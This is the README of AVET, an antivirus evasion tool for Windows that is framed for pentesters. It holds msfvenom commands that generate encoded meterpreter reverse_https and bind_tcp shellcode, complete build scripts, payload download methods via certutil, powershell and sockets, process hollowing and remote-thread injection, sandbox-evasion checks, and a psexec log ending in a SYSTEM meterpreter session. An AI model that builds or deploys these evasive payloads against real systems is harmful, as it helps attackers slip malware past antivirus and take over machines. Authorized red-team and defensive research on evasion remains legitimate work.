
AntiVirus Evasion Tool

Primary LanguageCGNU General Public License v3.0GPL-3.0

AntiVirus Evasion Tool

AVET is an AntiVirus Evasion Tool, which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. A lot of things are new in Version 2, for a complete overview have a look at the CHANGELOG file.

Some of the changes in Version 2:

  • internal mechanisms for building the executable have been rewritten, new features can be added much easier now
  • https://github.com/govolution/bfg has been integrated

With the new architecture and features you can, for example, now build an executable that is loading an encrypted .exe file via network or file, receiving the key also via network or file, decrypt in memory and then inject via process hollowing. The same applies also for other payloads like shellcode or dlls and other techniques.

What & Why:

  • when running an exe file made with msfpayload & co, the exe file will often be recognized by the antivirus software
  • avet is an antivirus evasion tool targeting windows machines with executable files
  • different kinds of payloads can be used now: shellcode, exe and dlls
  • more techniques can be used now, such as shellcode injection, process hollowing and more
  • most payloads can be deliverd from a file, the network or command line
  • the payload can be encrypted with a key, the key can be delivered like payloads
  • this readme applies for Kali 2018.x (64bit) and tdm-gcc (should work on other Kali/Linux versions also)


You can use the setup script:


This will automatically get you started by installing/configuring wine and installing tdm-gcc. You'll shortly have to click through the tdm-gcc installer GUI though - standard settings should be fine.

If for whatever reason you want to do things manually:

How to install tdm-gcc with wine: https://govolution.wordpress.com/2017/02/04/using-tdm-gcc-with-kali-2/

Important note

Not all techniques will evade every AV engine. If one technique or build script does not work, please test another one.

How to use

Of course, it is possible to run all commands step by step from command line. However, in the "build" folder you will find preconfigured build scripts for relevant use cases. The build scripts themselves are expected to be called within the avet directory:

root@kalidan:~/tools/avet# ./build/build_win32_meterpreter_rev_https_50xshikata_quiet.sh

You can define default LHOST and LPORT values for metasploit payloads in the /build/global_connect_config.sh file, which are used if you don't redefine in your current build script.


Before executing build scripts, ensure that your msf database is started up and initialized. If you don't, msfvenom will be hesitant to launch and your build script execution will get stuck!

Usage examples

Generate a 32-bit process hollowing executable in two steps (as in build_win32_meterpreter_rev_tcp_hollowing_target_cmd.sh):

First, generate the hollowing payload with AVET:

- generate meterpreter/reverse_tcp 32-bit shellcode
- the meterpreter shellcode will be XOR encrypted with a 5-byte preset key
- the shellcode will be compiled into the generated executable
- fopen and gethostbyname sandbox evasion environmental checks will be made before executing the shellcode

Second, build the executable that delivers the first step payload via hollowing:

- statically compile the first step payload into the executable
- the payload will be XOR encrypted with a different 5-byte preset key
- again, fopen and gethostbyname sandbox evasion environmental checks will be made before hollowing
- the hollowing target PID will be delivered via command line argument on execution time

So you get a two-layer environmental checked and encrypted meterpreter payload, hollowed into a process of your choice. While the settings in the build script are mostly for demonstration purposes, there is a lot of flexibility to customize your generated executable by making simple modifications to the build script.

You could switch out data retrieval methods: Instead of statically compiling most data into the executable, you could download your hollowing payload via powershell, download the decryption key via sockets, use different encryption or environmental checks, etc. Or try to add more evasion layers by doing a third build iteration.

Of course, you can also design more minimalistic builds, like executing unencrypted shellcode with only one environmental check, or maybe 50 iterations of shikata are enough to reach your goal?

Choose/modify the build scripts, suiting your needs.

Note: All executables and other files generated by the build scripts can be found in the outout folder.

Build scripts

Below, find a list of all currently provided build scripts. The names should hint at each script's functionality. For detailed information, consider the comments inside the scripts. Feel free to modify/write your own build scripts to build your custom executable!


However, it is strongly recommended to use the avet_fabric.py! It makes the tool easier to use.

The fabric provides a more convenient interface on the command line, where you can choose which build script you want to use. It also gives you the opportunity to alter build scripts on the fly (see below).

The latter is especially useful as you can define new LHOST and LPORT variables for msfvenom each time you run a build script via the fabric. You can define default LHOST and LPORT values in the /build/global_connect_config.sh file, which are used if you don't redefine.

Here's a quick example (python3 || gtfo):

python3 avet_fabric.py

                       .|        ,       +
             *         | |      ((             *
                       |'|       `    ._____
         +     ___    |  |   *        |.   |' .---"|
       _    .-'   '-. |  |     .--'|  ||   | _|    |
    .-'|  _.|  |    ||   '-__  |   |  |    ||      |
    |' | |.    |    ||       | |   |  |    ||      |
 ___|  '-'     '    ""       '-'   '-.'    '`      |____

AVET Fabric by Daniel Sauder, Florian Saager

avet_fabric.py is an assistant for building exe files with shellcode payloads for targeted attacks and antivirus evasion.

0: build_win32_meterpreter_rev_https_shikata_fopen.sh
1: build_win32_meterpreter_rev_https_shikata_fopen_avet_encoding.sh
2: buildsvc_win32_meterpreter_bind_tcp_20xshikata.sh
3: build_win32_meterpreter_rev_https_50xshikata_quiet.sh
4: build_win32_meterpreter_rev_https_shikata_raw_loadfile.sh
5: build_win32_meterpreter_rev_https_ASCIIMSF_cmd.sh
6: build_win64_meterpreter_rev_https_xor_downloadexecshellcode.sh
7: build_win32_meterpreter_rev_https_shikata_downloadexecshellcode.sh
8: build_win32_shell_rev_tcp_shikata_fopen_kaspersky.sh
9: build_win32_meterpreter_rev_https_ASCIIMSF.sh
10: build_win32_meterpreter_rev_https_killswitch_shikata.sh
11: build_win32_exec_calc_injectdll_target_cmd.sh
12: build_win32_meterpreter_rev_https_shikata_download_powershell_raw_loadfile.sh
13: build_win32_meterpreter_rev_https_shikata_download_certutil_raw_loadfile.sh
14: build_win32_meterpreter_rev_https_50xshikata.sh
15: build_win64_meterpreter_rev_https_xor_fopen.sh
16: build_win32_meterpreter_rev_https_shikata_loadfile.sh
17: build_win32_meterpreter_unstaged_rev_https_40xshikata.sh
18: build_win32_meterpreter_rev_https_shikata_downloadexecshellcode_DKMC.sh
19: build_win64_exec_calc_injectdll_target_cmd.sh
20: build_win32_meterpreter_rev_tcp_hollowing_target_cmd.sh
21: build_win64_meterpreter_rev_https_xor_avet.sh
22: build_win64_meterpreter_rev_https_injectshellcode_target_cmd.sh
23: build_win32_meterpreter_rev_https_fopen_shikata_quiet.sh
24: build_win32_meterpreter_rev_https_shikata_load_ie.sh
25: build_win64_meterpreter_rev_https_hollowing_target_cmd.sh
26: build_win32_meterpreter_rev_tcp_injectshellcode_target_cmd.sh
Input number of the script you want use and hit enter: 0

Now you can edit the build script line by line.

Apply shikata and perform fopen sandbox evasion.
print AVET logo
$ cat banner.txt
include script containing the compiler var $win32_compiler
you can edit the compiler in build/global_win32.sh
or enter $win32_compiler="mycompiler" here
$ . build/global_win32.sh
import feature construction interface
$ . build/feature_construction.sh
import global default lhost and lport values from build/global_connect_config.sh
$ . build/global_connect_config.sh
override connect-back settings here, if necessary
generate payload and call avet
$ msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt
add fopen sandbox evasion
$ add_evasion fopen_sandbox_evasion
set shellcode source
$ set_payload_source static_from_file input/sc_c.txt
set decoder and key source
$ set_decoder none
$ set_key_source none
set payload info source
$ set_payload_info_source none
set shellcode binding technique
$ set_payload_execution_method exec_shellcode
enable debug output
$ enable_debug_print
$ $win32_compiler -o output/output.exe source/avet.c
$ strip output/output.exe
$ cleanup_techniques

The following commands will be executed:
cat banner.txt
. build/global_win32.sh
. build/feature_construction.sh
. build/global_connect_config.sh
msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt
add_evasion fopen_sandbox_evasion
set_payload_source static_from_file input/sc_c.txt
set_decoder none
set_key_source none
set_payload_info_source none
set_payload_execution_method exec_shellcode
$win32_compiler -o output/output.exe source/avet.c
strip output/output.exe

Press enter to continue.

Building the output file...

Please stand by...

The output file should be placed in the current directory.



Data retrieval methods


The data is retrieved from a file and is statically compiled into the generated executable. For this to work, the data must be provided as a c-style array at compilation time, like unsigned char buf[] = "\x00\x11\x22\x33";.


The data is read from a file at run time.


Retrieves data from a 11aabb22.. format hex string (from the command line).


Retrieves data from a command line argument. The given ASCII string is interpreted as raw byte data.


Downloads data from a specified URI, using certutil.exe -urlcache -split -f. Drops the downloaded file to disk before reading the data.


Downloads data from a specified URL, using Internet Explorer. Drops the downloaded file to disk before reading the data. Included for historical reasons.


Downloads data from a specified URI via powershell. Drops the downloaded file to disk before reading the data.


Downloads the data from a specified URI, using sockets. Data is read directly into memory, no file is dropped to disk.

Payload execution methods


Executes 32-bit shellcode with a C function binding.


Executes 64-bit shellcode with a C function binding and VirtualProtect.


Executes ASCIIMSF encoded shellcode via call eax.


Instanciates a new process, cuts out the original image and hollows the given payload into the new process. The payload is a 32-bit executable image. Works on 32-bit targets.


Same as hollowing32, but using 64-bit PE payloads for 64-bit target processes.


Injects a dll into a target process, using CreateRemoteThread. Injection works for 32-bit payloads into 32-bit processes, and 64-bit payloads into 64-bit processes, respectively.


Injects shellcode into a target process, using CreateRemoteThread. Injection work for 32-bit shellcode into 32-bit processes, and 64-bit shellcode into 64-bit processes, respectively.



Rolling XOR, supporting multi-byte keys.


Custom encoding, reinterpreting the ASCII format.

Sandbox evasion


Checks for the existence of C:\windows\system.ini. If not found, stop execution.


Try to resolve a hostname of your choice. If gethostbyname returns unequals NULL, stop execution.


Not really an evasion technique, but hides your console window ;)

Helper tools


Takes raw data as input from a file, converts it into C-array format and writes output to another file. This aids in providing the correct format for the static_from_file data retrieval method.


Key generation utility. Generates either a (non-cryptographically) random key or takes a preset key as input, and outputs the raw key data into a specified file. This aids in providing key material for the AVET encryption feature.


Utility from AVET 1.3 that performs AVET encoding.

AVET & metasploit psexec

AVET supports metasploit's psexec module. The corresponding build script looks like:

# simple example script for building the .exe file
# for use with msf psexec module

# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh

# import global default lhost and lport values from build/global_connect_config.sh
. build/global_connect_config.sh

# override connect-back settings here, if necessary

# make meterpreter bind payload, encoded 20 rounds with shikata_ga_nai
msfvenom -p windows/meterpreter/bind_tcp lport=$LPORT -e x86/shikata_ga_nai -i 20 -f raw -a x86 --platform Windows > input/sc_raw.txt

# import feature construction interface
. build/feature_construction.sh

# add evasion techniques
add_evasion fopen_sandbox_evasion
add_evasion gethostbyname_sandbox_evasion
printf "\n#define HOSTVALUE \"this.that\"" >> source/evasion/evasion.include

# generate key file
generate_key preset aabbcc12de input/key_raw.txt

# encode shellcode
encode_payload xor input/sc_raw.txt input/scenc_raw.txt input/key_raw.txt

# array name buf is expected by static_from_file retrieval method
./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf

# set shellcode source
set_payload_source static_from_file input/scenc_c.txt

# convert generated key from raw to C into array "key"
./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key

# set key source
set_key_source static_from_file input/key_c.txt

# set payload info source
set_payload_info_source none

# set decoder
set_decoder xor

# set shellcode binding technique
set_payload_execution_method exec_shellcode

# enable debug printing
enable_debug_print to_file C:/avetdbg.txt

# compile as service
$win32_compiler -o output/service.exe source/avetsvc.c -lws2_32
strip output/service.exe

# cleanup

And on the metasploit site:

msf exploit(psexec) > use exploit/windows/smb/psexec
msf exploit(psexec) > set EXE::custom /root/tools/ave/pwn.exe
EXE::custom => /root/tools/ave/pwn.exe
msf exploit(psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(psexec) > set rhost
rhost =>
msf exploit(psexec) > set smbuser dax
smbuser => dax
msf exploit(psexec) > set smbpass test123
smbpass => test123
msf exploit(psexec) > set lport 8443
lport => 8443
msf exploit(psexec) > run

[*] - Connecting to the server...
[*] Started bind handler
[*] - Authenticating to as user 'dax'...
[*] Sending stage (957487 bytes) to
[*] - Selecting native target
[*] - Uploading payload...
[*] - Using custom payload /root/tools/avepoc/a.exe, RHOST and RPORT settings will be ignored!
[*] - Created \mzrCIOVg.exe...
[+] - Service started successfully...
[*] - Deleting \mzrCIOVg.exe...
[-] - Delete of \mzrCIOVg.exe failed: The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)
[*] Exploit completed, but no session was created.
msf exploit(psexec) > [*] Meterpreter session 4 opened ( -> at 2017-05-27 18:47:23 +0200

msf exploit(psexec) > sessions

Active sessions

Id Type Information Connection
-- ---- ----------- ----------
4 meterpreter x86/windows NT-AUTORIT_T\SYSTEM @ DAX-RYMZ48Z3EYO -> (

msf exploit(psexec) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer : DAX-RYMZ48Z3EYO
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : de_DE
Logged On Users : 2
Meterpreter : x86/windows


For basics about antivirus evasion, AVET & more information have a look here (most content is for version 1.3):